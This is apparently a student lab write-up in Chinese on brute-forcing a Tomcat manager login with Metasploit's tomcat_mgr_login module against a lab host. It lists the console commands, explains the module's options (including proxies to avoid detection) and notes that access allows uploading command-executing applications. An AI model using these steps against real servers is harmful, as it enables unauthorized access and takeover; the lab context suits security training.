使用Metasploit爆破Tomcat密码

一、本次内容

在本次实验中我们将使用metasploit某个模块对tomcat管理界面实施密码暴力破解攻击以获得一个管理器的访问权限。

二、 实验环境配置

1. 启动数据库服务并初始化

Msf使用的是postgreSQL数据库来存储日志和结果

启动postgreSQL的命令： service postgresql start 

创建并初始化数据库的命令: msfdb init 

2. 启动msf

命令：msfconsole

3. 靶场

靶场IP是192.168.17.131

 三、攻击过程

1. 打开靶场中的Tomcat Server 

在kali linux的firefox浏览器中输入http://192.168.17.131:8080/manager/html​​​​​​

 靶机中有一个Tomcat Server服务在运行，端口是8080，通过浏览器进行访问。显示登入弹窗。

2. 在Kali linux中启动msf并加载爆破模块

命令：use auxiliary/scanner/http/tomcat_mgr_login

3. show options查看需要设置的参数

4. 设置参数

命令：set rhosts 192.168.17.131    设置目标ip

           set threads 5    设置线程

           set bruteforce_speed 3    破解速度降低

 5. run运行

 6. 在一些失败结果后，发现了一个有效的密码！（绿色加号） 

7.  返回浏览器使用该用户名和密码登录后的结果

 

8. 总结

默认情况下，tomcat服务会开启在8080端口，管理界面目录在/manager/html

该应用使用基础http认证。刚刚使用的tomcat_mgr_login模块有一些参数需要讲解一下： 

 BLANK_PASSWORDS: 为每一个账号提供一个空密码测试 

 PASSWORD: 设置这个可以一密码多用户的方式进行测试 

 PASS_FILE: 输入你想使用的密码字典路径  Proxies: 为了避免被检测到源地址，可以使用这个代理功能 

 RHOSTS：填写要测试的主机（可以是多个，以空格分隔。也可以是一个清单文件） 

 RPORT：设置目标tomcat运行端口  STOP_ON_SUCCESS：当破解成功后停止攻击 

 TARGERURI：管理界面的目录路径 

 USERNAME：定义要测试的用户名（可以使单个，也可以是一个字典文件） 

 USER_PASS_FILE：使用 用户名/密码 格式的字典文件 

 USER_AS_PASS：尝试使用测试中的用户名作为密码 一旦成功进入tomcat管理界面，就能看到并操作安装在上面的应用。 此外可以上传自己的应用（包括能在服务器执行命令的应用）。

9.心得体会

通过学习使用metasploit爆破tomcat密码让我懂得了网络的不安全性，都存在许多的漏洞会泄露我们的信息。